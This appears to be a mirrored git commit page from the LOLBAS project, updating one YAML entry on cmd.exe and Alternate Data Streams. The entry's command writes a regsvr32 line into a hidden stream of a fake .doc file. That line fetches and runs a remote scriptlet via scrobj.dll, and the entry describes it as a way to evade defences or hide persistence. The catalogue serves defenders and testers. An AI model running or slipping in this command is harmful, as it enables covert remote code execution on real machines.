mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 06:49:09 +01:00
commit
6c20e750e8
@ -4,7 +4,7 @@ Description: The command-line interpreter in Windows
|
|||||||
Author: 'Ye Yint Min Thu Htut'
|
Author: 'Ye Yint Min Thu Htut'
|
||||||
Created: '2019-06-26'
|
Created: '2019-06-26'
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||||
Description: Add content to an Alternate Data Stream (ADS).
|
Description: Add content to an Alternate Data Stream (ADS).
|
||||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||||
Category: ADS
|
Category: ADS
|
||||||
|
Loading…
Reference in New Issue
Block a user